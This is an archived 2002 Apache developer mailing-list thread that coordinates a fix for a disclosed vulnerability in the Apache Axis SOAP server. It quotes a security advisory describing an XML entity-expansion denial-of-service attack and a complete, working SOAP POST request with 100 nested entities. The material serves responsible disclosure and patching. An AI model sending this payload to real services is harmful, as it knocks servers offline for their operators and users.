Tom/Dims, Could you folks verify this and report back to [EMAIL PROTECTED] that each of those are 100% taken care of ?
Then security@ can report back to the various constituencies, work with CERT if that is needed, etc. If you have any thoughds/statement which need to be added - make sure you add that. Dw On Tue, 26 Nov 2002, Davanum Srinivas wrote: > I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2) > > Thanks, > dims > > --- Ted Leung <[EMAIL PROTECTED]> wrote: > > This security alert came through today. > > > > Ted > > ----- Original Message ----- > > From: "Ian Holsman" <[EMAIL PROTECTED]> > > To: <[EMAIL PROTECTED]> > > Cc: "Ory Segal" <[EMAIL PROTECTED]> > > Sent: Tuesday, November 26, 2002 8:02 AM > > Subject: Security Alert - Apache/Axis > > > > > > > Dear [EMAIL PROTECTED], > > > > > > During a recent security audit at one of our customers, Sanctum found a > > > security vulnerability in your product Apache/Axis. > > > The details of this vulnerability are described in the attached text file. > > > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site > > > forums about this vulnerability the last week of November. Please note, > > the > > > advisory will not contain specifics that might enable someone to exploit > > the > > > vulnerability. > > > > > > We would appreciate it if you could issue a patch in that timeline (i.e. > > > around November 25th), so it can be linked to our advisory. > > > > > > Please feel free to contact me for more information/help. > > > > > > Thanks, > > > -Amit > > > > > > <<XML_DTD_Axis.txt>> > > > > > > > > > > > > ---------------------------------------------------------------------------- > > ---- > > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: [EMAIL PROTECTED] > > > For additional commands, e-mail: [EMAIL PROTECTED] > > > /////////////////////////////////////////////////////////////////////// > > ========================>> Security Advisory <<======================== > > /////////////////////////////////////////////////////////////////////// > > > > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/ > > > > => Release date: 14/Nov/2002 > > > > => Vendor: Apache Group > > > > The following product was found to be vulnerable: > > > > - Apache Axis SOAP server (checked with Xerces-J and Tomcat) > > > > The versions affected are the latest ones (as of October 2002). > > > > => Severity: High > > > > => CVE candidate: Not assigned yet. > > > > => Summary: Using the DTD part of the XML document, it is possible to cause the > > XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in > > a denial of service condition. > > > > => Description: The DTD part of the XML document enables the document to define > > named entities (other than the predefined <, >, etc.). The entities can be > > defined using other entities (recursion is prohibited in XML 1.0). > > Entities are expanded when they are referenced, inside the XML document. > > The attack is comprised of defining and referencing an entity which is defined > > using two instances of another entity, which is (in turn) defined as two instances > > of yet another entity, and so on. This definition process can be repeated as long > > as "necessary" - we found that nesting level of 100 is usually sufficient. > > The 100th entity should be defined simply as a string. This has the effect of >having > > the first entity contain, in theory, 2^99 (two to the power of ninety nine) > > concatenated values of the 100th entity. > > Here's an example (the DTD is to be placed after the XML declaration, and before >the > > root element of the XML document): > > > > <!DOCTYPE root [ > > <!ENTITY x100 "foobar"> > > <!ENTITY x99 "&x100;&x100;"> > > <!ENTITY x98 "&x99;&x99;"> > > <!ENTITY x97 "&x98;&x98;"> > > ... > > <!ENTITY x3 "&x4;&x4;"> > > <!ENTITY x2 "&x3;&x3;"> > > <!ENTITY x1 "&x2;&x2;"> > > ]> > > > > Referring to the first entity inside a document that would otherwise be accepted by > > the application (using the syntax &x1;), results in a DoS condition, due to the > > excessive CPU load and/or memory load required by the XML parser to expand this >entity. > > > > => Solution: Not available yet. > > > > => Workaround: Not available yet. > > > > => Example: > > > > Ory Segal from Sanctum devised a SOAP request that manages to mount this attack >requiring > > only a path to an existing web service to be known to the attacker. > > > > The request is: > > > > POST path_to_web_service HTTP/1.0 > > Host: ... > > Content-Type: text/xml > > SOAPAction: "" > > Content-Length: 3224 > > > > <?xml version="1.0" ?> > > <!DOCTYPE foobar [ > > <!ENTITY x0 "hello"> > > <!ENTITY x1 "&x0;&x0;"> > > <!ENTITY x2 "&x1;&x1;"> > > <!ENTITY x3 "&x2;&x2;"> > > <!ENTITY x4 "&x3;&x3;"> > > <!ENTITY x5 "&x4;&x4;"> > > <!ENTITY x6 "&x5;&x5;"> > > <!ENTITY x7 "&x6;&x6;"> > > <!ENTITY x8 "&x7;&x7;"> > > <!ENTITY x9 "&x8;&x8;"> > > <!ENTITY x10 "&x9;&x9;"> > > <!ENTITY x11 "&x10;&x10;"> > > <!ENTITY x12 "&x11;&x11;"> > > <!ENTITY x13 "&x12;&x12;"> > > <!ENTITY x14 "&x13;&x13;"> > > <!ENTITY x15 "&x14;&x14;"> > > <!ENTITY x16 "&x15;&x15;"> > > <!ENTITY x17 "&x16;&x16;"> > > <!ENTITY x18 "&x17;&x17;"> > > <!ENTITY x19 "&x18;&x18;"> > > <!ENTITY x20 "&x19;&x19;"> > > <!ENTITY x21 "&x20;&x20;"> > > <!ENTITY x22 "&x21;&x21;"> > > <!ENTITY x23 "&x22;&x22;"> > > <!ENTITY x24 "&x23;&x23;"> > > <!ENTITY x25 "&x24;&x24;"> > > <!ENTITY x26 "&x25;&x25;"> > > <!ENTITY x27 "&x26;&x26;"> > > <!ENTITY x28 "&x27;&x27;"> > > <!ENTITY x29 "&x28;&x28;"> > > <!ENTITY x30 "&x29;&x29;"> > > <!ENTITY x31 "&x30;&x30;"> > > <!ENTITY x32 "&x31;&x31;"> > > <!ENTITY x33 "&x32;&x32;"> > > <!ENTITY x34 "&x33;&x33;"> > > <!ENTITY x35 "&x34;&x34;"> > > <!ENTITY x36 "&x35;&x35;"> > > <!ENTITY x37 "&x36;&x36;"> > > <!ENTITY x38 "&x37;&x37;"> > > <!ENTITY x39 "&x38;&x38;"> > > <!ENTITY x40 "&x39;&x39;"> > > <!ENTITY x41 "&x40;&x40;"> > > <!ENTITY x42 "&x41;&x41;"> > > <!ENTITY x43 "&x42;&x42;"> > > <!ENTITY x44 "&x43;&x43;"> > > <!ENTITY x45 "&x44;&x44;"> > > <!ENTITY x46 "&x45;&x45;"> > > <!ENTITY x47 "&x46;&x46;"> > > <!ENTITY x48 "&x47;&x47;"> > > <!ENTITY x49 "&x48;&x48;"> > > <!ENTITY x50 "&x49;&x49;"> > > <!ENTITY x51 "&x50;&x50;"> > > <!ENTITY x52 "&x51;&x51;"> > > <!ENTITY x53 "&x52;&x52;"> > > <!ENTITY x54 "&x53;&x53;"> > > <!ENTITY x55 "&x54;&x54;"> > > <!ENTITY x56 "&x55;&x55;"> > > <!ENTITY x57 "&x56;&x56;"> > > <!ENTITY x58 "&x57;&x57;"> > > <!ENTITY x59 "&x58;&x58;"> > > <!ENTITY x60 "&x59;&x59;"> > > <!ENTITY x61 "&x60;&x60;"> > > <!ENTITY x62 "&x61;&x61;"> > > <!ENTITY x63 "&x62;&x62;"> > > <!ENTITY x64 "&x63;&x63;"> > > <!ENTITY x65 "&x64;&x64;"> > > <!ENTITY x66 "&x65;&x65;"> > > <!ENTITY x67 "&x66;&x66;"> > > <!ENTITY x68 "&x67;&x67;"> > > <!ENTITY x69 "&x68;&x68;"> > > <!ENTITY x70 "&x69;&x69;"> > > <!ENTITY x71 "&x70;&x70;"> > > <!ENTITY x72 "&x71;&x71;"> > > <!ENTITY x73 "&x72;&x72;"> > > <!ENTITY x74 "&x73;&x73;"> > > <!ENTITY x75 "&x74;&x74;"> > > <!ENTITY x76 "&x75;&x75;"> > > <!ENTITY x77 "&x76;&x76;"> > > <!ENTITY x78 "&x77;&x77;"> > > <!ENTITY x79 "&x78;&x78;"> > > <!ENTITY x80 "&x79;&x79;"> > > <!ENTITY x81 "&x80;&x80;"> > > <!ENTITY x82 "&x81;&x81;"> > > <!ENTITY x83 "&x82;&x82;"> > > <!ENTITY x84 "&x83;&x83;"> > > <!ENTITY x85 "&x84;&x84;"> > > <!ENTITY x86 "&x85;&x85;"> > > <!ENTITY x87 "&x86;&x86;"> > > <!ENTITY x88 "&x87;&x87;"> > > <!ENTITY x89 "&x88;&x88;"> > > <!ENTITY x90 "&x89;&x89;"> > > <!ENTITY x91 "&x90;&x90;"> > > <!ENTITY x92 "&x91;&x91;"> > > <!ENTITY x93 "&x92;&x92;"> > > <!ENTITY x94 "&x93;&x93;"> > > <!ENTITY x95 "&x94;&x94;"> > > <!ENTITY x96 "&x95;&x95;"> > > <!ENTITY x97 "&x96;&x96;"> > > <!ENTITY x98 "&x97;&x97;"> > > <!ENTITY x99 "&x98;&x98;"> > > <!ENTITY x100 "&x99;&x99;"> > > ]> > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"; > > xmlns:xsd="http://www.w3.org/1999/XMLSchema";> > > <SOAP-ENV:Body> > > <ns1:aaa xmlns:ns1="urn:aaa" >SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";> > > <foobar xsi:type="xsd:string">&x100;</foobar> > > </ns1:aaa> > > </SOAP-ENV:Body> > > </SOAP-ENV:Envelope> > > > > > > > ===== > Davanum Srinivas - http://xml.apache.org/~dims/ > > __________________________________________________ > Do you Yahoo!? > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > http://mailplus.yahoo.com > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [EMAIL PROTECTED] > For additional commands, e-mail: [EMAIL PROTECTED] > >
